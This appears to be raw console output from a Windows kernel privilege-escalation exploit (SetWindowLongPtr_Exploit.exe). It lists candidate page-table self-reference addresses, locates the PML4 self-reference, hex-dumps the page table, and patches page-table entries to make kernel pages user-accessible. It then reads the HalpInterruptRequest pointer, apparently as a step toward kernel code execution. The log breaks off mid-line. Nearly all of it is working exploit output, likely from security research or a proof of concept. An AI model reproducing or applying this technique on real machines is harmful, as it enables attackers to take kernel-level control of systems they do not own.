Left in Potential Array: ffffd7ebf5fafd78 Left in Potential Array: ffffd86c361b0d80 Left in Potential Array: ffffd8ec763b1d88 Left in Potential Array: ffffd96cb65b2d90 Left in Potential Array: ffffd9ecf67b3d98 Left in Potential Array: ffffda6d369b4da0 Left in Potential Array: ffffdaed76bb5da8 Left in Potential Array: ffffdb6db6db6db0 Left in Potential Array: ffffdbedf6fb7db8 Left in Potential Array: ffffdc6e371b8dc0 Left in Potential Array: ffffdcee773b9dc8 Left in Potential Array: ffffdd6eb75badd0 Left in Potential Array: ffffddeef77bbdd8 Left in Potential Array: ffffde6f379bcde0 Left in Potential Array: ffffdeef77bbdde8 Left in Potential Array: ffffdf6fb7dbedf0 Left in Potential Array: ffffdfeff7fbfdf8 Left in Potential Array: ffffe070381c0e00 Left in Potential Array: ffffe0f0783c1e08 Left in Potential Array: ffffe170b85c2e10 Left in Potential Array: ffffe1f0f87c3e18 Left in Potential Array: ffffe271389c4e20 Left in Potential Array: ffffe2f178bc5e28 Left in Potential Array: ffffe371b8dc6e30 Left in Potential Array: ffffe3f1f8fc7e38 Left in Potential Array: ffffe472391c8e40 Left in Potential Array: ffffe4f2793c9e48 Left in Potential Array: ffffe572b95cae50 Left in Potential Array: ffffe5f2f97cbe58 Left in Potential Array: ffffe673399cce60 Left in Potential Array: ffffe6f379bcde68 Left in Potential Array: ffffe773b9dcee70 Left in Potential Array: ffffe7f3f9fcfe78 Left in Potential Array: ffffe8743a1d0e80 Left in Potential Array: ffffe8f47a3d1e88 Left in Potential Array: ffffe974ba5d2e90 Left in Potential Array: ffffe9f4fa7d3e98 Left in Potential Array: ffffea753a9d4ea0 Left in Potential Array: ffffeaf57abd5ea8 Left in Potential Array: ffffeb75badd6eb0 Left in Potential Array: ffffebf5fafd7eb8 Left in Potential Array: ffffec763b1d8ec0 Left in Potential Array: ffffecf67b3d9ec8 Left in Potential Array: ffffed76bb5daed0 Left in Potential Array: ffffedf6fb7dbed8 Left in Potential Array: ffffee773b9dcee0 Left in Potential Array: ffffeef77bbddee8 Left in Potential Array: ffffef77bbddeef0 Left in Potential Array: ffffeff7fbfdfef8 Left in Potential Array: fffff0783c1e0f00 Left in Potential Array: fffff0f87c3e1f08 Left in Potential Array: fffff178bc5e2f10 Left in Potential Array: fffff1f8fc7e3f18 Left in Potential Array: fffff2793c9e4f20 Left in Potential Array: fffff2f97cbe5f28 Left in Potential Array: fffff379bcde6f30 Left in Potential Array: fffff3f9fcfe7f38 Left in Potential Array: fffff47a3d1e8f40 Left in Potential Array: fffff4fa7d3e9f48 Left in Potential Array: fffff57abd5eaf50 Left in Potential Array: fffff5fafd7ebf58 Left in Potential Array: fffff6fb7dbedf68 Left in Potential Array: fffff77bbddeef70 Left in Potential Array: fffff7fbfdfeff78 Left in Potential Array: fffff87c3e1f0f80 Left in Potential Array: fffff8fc7e3f1f88 Left in Potential Array: fffff97cbe5f2f90 Left in Potential Array: fffff9fcfe7f3f98 Left in Potential Array: fffffa7d3e9f4fa0 Left in Potential Array: fffffafd7ebf5fa8 Left in Potential Array: fffffb7dbedf6fb0 Left in Potential Array: fffffbfdfeff7fb8 Left in Potential Array: fffffc7e3f1f8fc0 Left in Potential Array: fffffcfe7f3f9fc8 Left in Potential Array: fffffd7ebf5fafd0 Left in Potential Array: fffffdfeff7fbfd8 Left in Potential Array: fffffe7f3f9fcfe0 Left in Potential Array: fffffeff7fbfdfe8 Left in Potential Array: ffffff7fbfdfeff0 Left in Potential Array: fffffffffffffff8 Left in Final Array: fffff67b3d9ecf60 Result: fffff67b3d9ecf60 Run SetWindowLongPtr_Exploit.exe C:\Users\qa\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60 My PID is: 6056 Current Username: qa PML4 Self Ref: FFFFF67B3D9ECF60 Enter to continue... Value Self Ref = 8000000100211867 000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k.... 000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh.............. 000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`. 000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8...... 000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8...... 000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?.... 000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............ 000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?............. 000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5..... 000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G..... 000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c....... 000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx.............. 000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W............. 000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*.... 000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx.............. 000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!............. 000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c....... 000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | c@.............. 000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8...... 000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c....... +] Selected spurious PML4E: fffff67b3d9ecf00 +] Spurious PT: fffff67b3d9e0000 +] Content pml4e fffff67b3d9ecff8: 99f063 +] Patching the Spurious Offset with 99f067 +] Content pdpte fffff67b3d9ffff8: 9a0063 +] Patching the Spurious Offset with 9a0067 +] Content pdpte fffff67b3ffffff0: 821063 +] Patching the Spurious Offset with 821067 +] Content pte fffff67fffffe800: 1967 +] Patching the Spurious Offset with 1967 Original HalpIntteruptRequest pointer: fffff80150e1fc40 +] Selected spurious PML4E: fffff67b3d9ecf08 +] Spurious PT: fffff67b3d9e1000 +] Content pml4e fffff67b3d9ecff8: 99f063 +] Patching the Spurious Offset with 99f067 +] Content pdpte fffff67b3d9ffff8: 9a0063 +] Patching the Spurious Offset with 9a0067 +] Content pdpte fffff67b3ffffff0: 821063 +] Patching the Spurious Offset with 